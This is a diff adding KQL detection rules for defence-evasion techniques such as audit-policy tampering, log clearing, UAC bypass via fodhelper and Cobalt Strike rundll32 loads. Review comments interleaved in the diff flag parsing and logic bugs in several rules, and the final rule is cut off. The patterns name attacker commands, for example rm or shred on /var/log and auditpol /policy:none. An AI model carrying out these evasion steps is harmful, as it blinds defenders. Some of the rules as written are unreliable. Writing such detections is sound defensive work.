+++ b/KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql
@@ -0,0 +1,14 @@
+// Title: Audit Policy Tampering Via Auditpol
+// Author: Janantha Marasinghe (https://github.com/blueteam0ps)
+// Date: 2021-02-02
+// Level: high
+// Description: Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.
+This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002
+// False Positives:
+// - Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "disable" or ProcessCommandLine contains "clear" or ProcessCommandLine contains "remove" or ProcessCommandLine contains "restore") and (FolderPath endswith "\\auditpol.exe" or ProcessVersionInfoOriginalFileName =~ "AUDITPOL.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql b/KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql
new file mode 100644
index 00000000..12fe1441
--- /dev/null
+++ b/KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql
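Review bot: The second Description line, `+This can be carried out by selectively disabling/removing ...`, is emitted without the `//` prefix, so it is not a comment and the query will fail to parse — bare text before `DeviceProcessEvents` can only be read as a statement. Every continuation line of a multi-line description in this commit shows the same pattern (the NT Resource Kit auditpol, auditctl, BaaUpdate, Bad Opsec, BitLockerToGo, CodePage, Xwizard and Non-Existent System DLL rules), which points at the generator's description handling rather than this one file. Prefix each continuation line: `// This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.`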
@@ -0,0 +1,14 @@
+// Title: Audit Policy Tampering Via NT Resource Kit Auditpol
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-18
+// Level: high
+// Description: Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.
+This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002
+// False Positives:
+// - The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/logon:none" or ProcessCommandLine contains "/system:none" or ProcessCommandLine contains "/sam:none" or ProcessCommandLine contains "/privilege:none" or ProcessCommandLine contains "/object:none" or ProcessCommandLine contains "/process:none" or ProcessCommandLine contains "/policy:none"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql b/KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql
new file mode 100644
index 00000000..954d84b1
--- /dev/null
+++ b/KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql
@@ -0,0 +1,15 @@
+// Title: Audit Rules Deleted Via Auditctl
+// Author: Mohamed LAKRI
+// Date: 2025-10-17
+// Level: high
+// Description: Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems.
+This technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities.
+Removal of audit rules can significantly impair detection of malicious activities on the affected system.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.012
+// False Positives:
+// - An administrator troubleshooting. Investigate all attempts.
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "-D" and FolderPath endswith "/auditctl"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql b/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql
new file mode 100644
index 00000000..08ca00c1
--- /dev/null
+++ b/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql
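Review bot: `matches regex "-D"` on the last line is unanchored, so it also fires whenever `-D` sits inside a longer token of the command line (a `-k` key name, or a path such as `-F exe=/opt/foo-Daemon`), while giving no extra precision for the bare `auditctl -D` it is after. The regex is presumably there for case sensitivity — `contains` is case-insensitive in KQL and would also catch `-d`, which deletes a single rule — so keep the regex but anchor it to a whole argument: `| where ProcessCommandLine matches regex @"(^|\s)-D(\s|$)" and FolderPath endswith "/auditctl"`. The two description continuation lines (`+This technique ...`, `+Removal of audit rules ...`) also lack the `//` prefix and will break parsing.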
@@ -0,0 +1,12 @@
+// Title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl
+// Author: Julia Fomina, oscd.community
+// Date: 2020-10-06
+// Level: medium
+// Description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "winrm" and ((ProcessCommandLine contains "format:pretty" or ProcessCommandLine contains "format:\"pretty\"" or ProcessCommandLine contains "format:\"text\"" or ProcessCommandLine contains "format:text") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql b/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql
new file mode 100644
index 00000000..9c6576c2
--- /dev/null
+++ b/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql
@@ -0,0 +1,12 @@
+// Title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File
+// Author: Julia Fomina, oscd.community
+// Date: 2020-10-06
+// Level: medium
+// Description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where (FolderPath endswith "WsmPty.xsl" or FolderPath endswith "WsmTxt.xsl") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
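Review bot: The DeviceFileEvents query in the "- File" rule has no `ActionType` filter, so it matches deletion, rename and modification of WsmPty.xsl/WsmTxt.xsl as well as the creation the rule is after; an attacker's own cleanup would re-fire it. Add `and ActionType == "FileCreated"` to the where clause (widen to `ActionType in ("FileCreated", "FileRenamed")` if a file renamed into place should also count). If `FolderPath` in this table carries only the directory rather than the full path on your tenant, the `endswith "WsmPty.xsl"` test should instead be `FileName =~ "WsmPty.xsl"` — confirm against the schema before relying on it.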
diff --git a/KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql b/KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql
new file mode 100644
index 00000000..da220433
--- /dev/null
+++ b/KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql
@@ -0,0 +1,13 @@
+// Title: BaaUpdate.exe Suspicious DLL Load
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-10-18
+// Level: high
+// Description: Detects BitLocker Access Agent Update Utility (baaupdate.exe) loading DLLs from suspicious locations that are publicly writable which could indicate an attempt to lateral movement via BitLocker DCOM & COM Hijacking.
+This technique abuses COM Classes configured as INTERACTIVE USER to spawn processes in the context of the logged-on user's session. Specifically, it targets the BDEUILauncher Class (CLSID ab93b6f1-be76-4185-a488-a9001b105b94)
+which can launch BaaUpdate.exe, which is vulnerable to COM Hijacking when started with input parameters. This allows attackers to execute code in the user's context without needing to steal credentials or use additional techniques to compromise the account.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1021.003
+
+DeviceImageLoadEvents
+| where (FolderPath contains ":\\Perflogs\\" or FolderPath contains ":\\Users\\Default\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\AppData\\Roaming\\" or FolderPath contains "\\Contacts\\" or FolderPath contains "\\Favorites\\" or FolderPath contains "\\Favourites\\" or FolderPath contains "\\Links\\" or FolderPath contains "\\Music\\" or FolderPath contains "\\Pictures\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Temporary Internet" or FolderPath contains "\\Videos\\") and FolderPath endswith ".dll" and InitiatingProcessFolderPath endswith "\\BaaUpdate.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql b/KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql
new file mode 100644
index 00000000..69290c62
--- /dev/null
+++ b/KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql
@@ -0,0 +1,15 @@
+// Title: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
+// Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)
+// Date: 2020-10-23
+// Level: high
+// Description: Detects attackers using tooling with bad opsec defaults.
+E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.
+One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine endswith "regasm.exe" and FolderPath endswith "\\regasm.exe") or (ProcessCommandLine endswith "regsvcs.exe" and FolderPath endswith "\\regsvcs.exe") or (ProcessCommandLine endswith "regsvr32.exe" and FolderPath endswith "\\regsvr32.exe") or (ProcessCommandLine endswith "rundll32.exe" and FolderPath endswith "\\rundll32.exe") or (ProcessCommandLine endswith "WerFault.exe" and FolderPath endswith "\\WerFault.exe")) and (not(((ProcessCommandLine endswith "rundll32.exe" and FolderPath endswith "\\rundll32.exe" and InitiatingProcessCommandLine contains "--uninstall " and (InitiatingProcessFolderPath contains "\\AppData\\Local\\BraveSoftware\\Brave-Browser\\Application\\" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Google\\Chrome\\Application\\") and InitiatingProcessFolderPath endswith "\\Installer\\setup.exe") or (ProcessCommandLine endswith "rundll32.exe" and FolderPath endswith "\\rundll32.exe" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/base64_encoded_powershell_command_detected.kql b/KQL/rules/Defense Evasion/base64_encoded_powershell_command_detected.kql
new file mode 100644
index 00000000..e49aff2f
--- /dev/null
+++ b/KQL/rules/Defense Evasion/base64_encoded_powershell_command_detected.kql
@@ -0,0 +1,12 @@
+// Title: Base64 Encoded PowerShell Command Detected
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-01-29
+// Level: high
+// Description: Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string
+// MITRE Tactic: Defense Evasion
+// Tags: attack.t1027, attack.defense-evasion, attack.execution, attack.t1140, attack.t1059.001
+// False Positives:
+// - Administrative script libraries
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "::FromBase64String("
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/binary_padding_macos.kql b/KQL/rules/Defense Evasion/binary_padding_macos.kql
new file mode 100644
index 00000000..f60896e4
--- /dev/null
+++ b/KQL/rules/Defense Evasion/binary_padding_macos.kql
@@ -0,0 +1,12 @@
+// Title: Binary Padding - MacOS
+// Author: Igor Fits, Mikhail Larin, oscd.community
+// Date: 2020-10-19
+// Level: high
+// Description: Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.001
+// False Positives:
+// - Legitimate script work
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "if=/dev/zero" or ProcessCommandLine contains "if=/dev/random" or ProcessCommandLine contains "if=/dev/urandom") and FolderPath endswith "/dd") or (ProcessCommandLine contains "-s +" and FolderPath endswith "/truncate")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql b/KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql
new file mode 100644
index 00000000..69577313
--- /dev/null
+++ b/KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql
@@ -0,0 +1,16 @@
+// Title: BitLockerTogo.EXE Execution
+// Author: Josh Nickels, mttaggart
+// Date: 2024-07-11
+// Level: low
+// Description: Detects the execution of "BitLockerToGo.EXE".
+BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of, USB flash drives, SD cards, External hard disk drives, Other drives that are formatted by using the NTFS, FAT16, FAT32, or exFAT file system.
+This is a rarely used application and usage of it at all is worth investigating.
+Malware such as Lumma stealer has been seen using this process as a target for process hollowing.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate usage of BitLockerToGo.exe to encrypt portable devices.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\BitLockerToGo.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/browser_execution_in_headless_mode.kql b/KQL/rules/Defense Evasion/browser_execution_in_headless_mode.kql
new file mode 100644
index 00000000..bafc18f9
--- /dev/null
+++ b/KQL/rules/Defense Evasion/browser_execution_in_headless_mode.kql
@@ -0,0 +1,10 @@
+// Title: Browser Execution In Headless Mode
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-12
+// Level: low
+// Description: Detects execution of Chromium based browser in headless mode
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control, attack.t1105, attack.t1564.003
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "--headless" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/bypass_uac_via_fodhelper_exe.kql b/KQL/rules/Defense Evasion/bypass_uac_via_fodhelper_exe.kql
new file mode 100644
index 00000000..5636a175
--- /dev/null
+++ b/KQL/rules/Defense Evasion/bypass_uac_via_fodhelper_exe.kql
@@ -0,0 +1,12 @@
+// Title: Bypass UAC via Fodhelper.exe
+// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community
+// Date: 2019-10-24
+// Level: high
+// Description: Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+// False Positives:
+// - Legitimate use of fodhelper.exe utility by legitimate user
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\fodhelper.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/c_il_code_compilation_via_ilasm_exe.kql b/KQL/rules/Defense Evasion/c_il_code_compilation_via_ilasm_exe.kql
new file mode 100644
index 00000000..faa662bb
--- /dev/null
+++ b/KQL/rules/Defense Evasion/c_il_code_compilation_via_ilasm_exe.kql
@@ -0,0 +1,10 @@
+// Title: C# IL Code Compilation Via Ilasm.EXE
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-05-07
+// Level: medium
+// Description: Detects the use of "Ilasm.EXE" in order to compile C# intermediate (IL) code to EXE or DLL.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /dll" or ProcessCommandLine contains " /exe") and (FolderPath endswith "\\ilasm.exe" or ProcessVersionInfoOriginalFileName =~ "ilasm.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/certificate_exported_via_certutil_exe.kql b/KQL/rules/Defense Evasion/certificate_exported_via_certutil_exe.kql
new file mode 100644
index 00000000..2ad75a9a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/certificate_exported_via_certutil_exe.kql
@@ -0,0 +1,12 @@
+// Title: Certificate Exported Via Certutil.EXE
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-15
+// Level: medium
+// Description: Detects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+// False Positives:
+// - There legitimate reasons to export certificates. Investigate the activity to determine if it's benign
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-exportPFX " or ProcessCommandLine contains "/exportPFX " or ProcessCommandLine contains "–exportPFX " or ProcessCommandLine contains "—exportPFX " or ProcessCommandLine contains "―exportPFX ") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/change_winevt_channel_access_permission_via_registry.kql b/KQL/rules/Defense Evasion/change_winevt_channel_access_permission_via_registry.kql
new file mode 100644
index 00000000..f4122fad
--- /dev/null
+++ b/KQL/rules/Defense Evasion/change_winevt_channel_access_permission_via_registry.kql
@@ -0,0 +1,10 @@
+// Title: Change Winevt Channel Access Permission Via Registry
+// Author: frack113
+// Date: 2022-09-17
+// Level: high
+// Description: Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002
+
+DeviceRegistryEvents
+| where ((RegistryValueData contains "(A;;0x1;;;LA)" or RegistryValueData contains "(A;;0x1;;;SY)" or RegistryValueData contains "(A;;0x5;;;BA)") and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels*" and RegistryKey endswith "\\ChannelAccess") and (not(((InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\servicing\\TrustedInstaller.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/chmod_suspicious_directory.kql b/KQL/rules/Defense Evasion/chmod_suspicious_directory.kql
new file mode 100644
index 00000000..7662daa6
--- /dev/null
+++ b/KQL/rules/Defense Evasion/chmod_suspicious_directory.kql
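Review bot: `RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels*"` treats the trailing `*` as a literal character — KQL `endswith` has no wildcard syntax — and it is ANDed with `RegistryKey endswith "\\ChannelAccess"`, so no key can satisfy both conditions and the rule can never fire. The asterisk looks like a leftover of a `contains`-style pattern that the backend rendered as `endswith`. Replace the two key tests with `RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\" and RegistryValueName =~ "ChannelAccess"`; in DeviceRegistryEvents the value name is normally surfaced in `RegistryValueName` rather than appended to `RegistryKey`, so even a corrected `endswith "\\ChannelAccess"` on the key would likely miss — confirm against your field mapping.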
@@ -0,0 +1,12 @@
+// Title: Chmod Suspicious Directory
+// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
+// Date: 2022-06-03
+// Level: medium
+// Description: Detects chmod targeting files in abnormal directory paths.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1222.002
+// False Positives:
+// - Admin changing file permissions.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/tmp/" or ProcessCommandLine contains "/.Library/" or ProcessCommandLine contains "/etc/" or ProcessCommandLine contains "/opt/") and FolderPath endswith "/chmod"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/clear_linux_logs.kql b/KQL/rules/Defense Evasion/clear_linux_logs.kql
new file mode 100644
index 00000000..6097fa76
--- /dev/null
+++ b/KQL/rules/Defense Evasion/clear_linux_logs.kql
@@ -0,0 +1,12 @@
+// Title: Clear Linux Logs
+// Author: Ömer Günal, oscd.community
+// Date: 2020-10-07
+// Level: medium
+// Description: Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.002
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/var/log" or ProcessCommandLine contains "/var/spool/mail") and (FolderPath endswith "/rm" or FolderPath endswith "/shred" or FolderPath endswith "/unlink")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/cmstp_execution_process_creation.kql b/KQL/rules/Defense Evasion/cmstp_execution_process_creation.kql
new file mode 100644
index 00000000..f5cd1660
--- /dev/null
+++ b/KQL/rules/Defense Evasion/cmstp_execution_process_creation.kql
@@ -0,0 +1,12 @@
+// Title: CMSTP Execution Process Creation
+// Author: Nik Seetharaman
+// Date: 2018-07-16
+// Level: high
+// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001
+// False Positives:
+// - Legitimate CMSTP use (unlikely in modern enterprise environments)
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\cmstp.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/cmstp_execution_registry_event.kql b/KQL/rules/Defense Evasion/cmstp_execution_registry_event.kql
new file mode 100644
index 00000000..08f66879
--- /dev/null
+++ b/KQL/rules/Defense Evasion/cmstp_execution_registry_event.kql
@@ -0,0 +1,12 @@
+// Title: CMSTP Execution Registry Event
+// Author: Nik Seetharaman
+// Date: 2018-07-16
+// Level: high
+// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001
+// False Positives:
+// - Legitimate CMSTP use (unlikely in modern enterprise environments)
+
+DeviceRegistryEvents
+| where RegistryKey contains "\\cmmgr32.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/cobaltstrike_load_by_rundll32.kql b/KQL/rules/Defense Evasion/cobaltstrike_load_by_rundll32.kql
new file mode 100644
index 00000000..262dc233
--- /dev/null
+++ b/KQL/rules/Defense Evasion/cobaltstrike_load_by_rundll32.kql
@@ -0,0 +1,10 @@
+// Title: CobaltStrike Load by Rundll32
+// Author: Wojciech Lesicki
+// Date: 2021-06-01
+// Level: high
+// Description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".dll" and (ProcessCommandLine endswith " StartW" or ProcessCommandLine endswith ",StartW")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or (ProcessCommandLine contains "rundll32.exe" or ProcessCommandLine contains "rundll32 "))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/code_execution_via_pcwutl_dll.kql b/KQL/rules/Defense Evasion/code_execution_via_pcwutl_dll.kql
new file mode 100644
index 00000000..e6facada
--- /dev/null
+++ b/KQL/rules/Defense Evasion/code_execution_via_pcwutl_dll.kql
@@ -0,0 +1,12 @@
+// Title: Code Execution via Pcwutl.dll
+// Author: Julia Fomina, oscd.community
+// Date: 2020-10-05
+// Level: medium
+// Description: Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+// False Positives:
+// - Use of Program Compatibility Troubleshooter Helper
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "pcwutl" and ProcessCommandLine contains "LaunchApplication") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql b/KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql
new file mode 100644
index 00000000..33ceb73a
--- /dev/null
+++ b/KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql
@@ -0,0 +1,14 @@
+// Title: CodePage Modification Via MODE.COM To Russian Language
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-01-17
+// Level: medium
+// Description: Detects a CodePage modification using the "mode.com" utility to Russian language.
+This behavior has been used by threat actors behind Dharma ransomware.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+// False Positives:
+// - Russian speaking people changing the CodePage
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " con " and ProcessCommandLine contains " cp " and ProcessCommandLine contains " select=") and (ProcessCommandLine endswith "=1251" or ProcessCommandLine endswith "=866")) and (FolderPath endswith "\\mode.com" or ProcessVersionInfoOriginalFileName =~ "MODE.COM")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql b/KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql
new file mode 100644
index 00000000..6e3610c5
--- /dev/null
+++ b/KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql
@@ -0,0 +1,12 @@
+// Title: COM Object Execution via Xwizard.EXE
+// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-10-07
+// Level: medium
+// Description: Detects the execution of Xwizard tool with the "RunWizard" flag and a GUID like argument.
+This utility can be abused in order to run custom COM object created in the registry.
+
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where ProcessCommandLine =~ "RunWizard" and ProcessCommandLine matches regex "\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/connection_proxy.kql b/KQL/rules/Defense Evasion/connection_proxy.kql
new file mode 100644
index 00000000..9ab632c3
--- /dev/null
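Review bot: In the Xwizard rule, `ProcessCommandLine =~ "RunWizard"` is a case-insensitive equality test, so the entire command line would have to be exactly `RunWizard`; ANDed with the GUID regex on the same line that is impossible and the rule never matches. The intent is a substring test: `| where ProcessCommandLine contains "RunWizard" and ProcessCommandLine matches regex "\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}"`. The query also carries no image or OriginalFileName condition although the title scopes it to Xwizard.EXE; if that scoping is intended, append `and FolderPath endswith "\\xwizard.exe"` so that any process merely passing `RunWizard` and a GUID does not fire it. The description continuation line `+This utility can be abused ...` is missing its `//` prefix and will break parsing.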
+++ b/KQL/rules/Defense Evasion/connection_proxy.kql
@@ -0,0 +1,12 @@
+// Title: Connection Proxy
+// Author: Ömer Günal
+// Date: 2020-06-17
+// Level: low
+// Description: Detects setting proxy configuration
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control, attack.t1090
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "http_proxy=" or ProcessCommandLine contains "https_proxy="
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/convertto_securestring_cmdlet_usage_via_commandline.kql b/KQL/rules/Defense Evasion/convertto_securestring_cmdlet_usage_via_commandline.kql
new file mode 100644
index 00000000..297196f1
--- /dev/null
+++ b/KQL/rules/Defense Evasion/convertto_securestring_cmdlet_usage_via_commandline.kql
@@ -0,0 +1,12 @@
+// Title: ConvertTo-SecureString Cmdlet Usage Via CommandLine
+// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
+// Date: 2020-10-11
+// Level: medium
+// Description: Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+// False Positives:
+// - Legitimate use to pass password to different powershell commands
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "ConvertTo-SecureString" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/createdump_process_dump.kql b/KQL/rules/Defense Evasion/createdump_process_dump.kql
new file mode 100644
index 00000000..d76aab5b
--- /dev/null
+++ b/KQL/rules/Defense Evasion/createdump_process_dump.kql
@@ -0,0 +1,12 @@
+// Title: CreateDump Process Dump
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-04
+// Level: high
+// Description: Detects uses of the createdump.exe LOLOBIN utility to dump process memory
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access
+// False Positives:
+// - Command lines that use the same flags
+
+DeviceProcessEvents
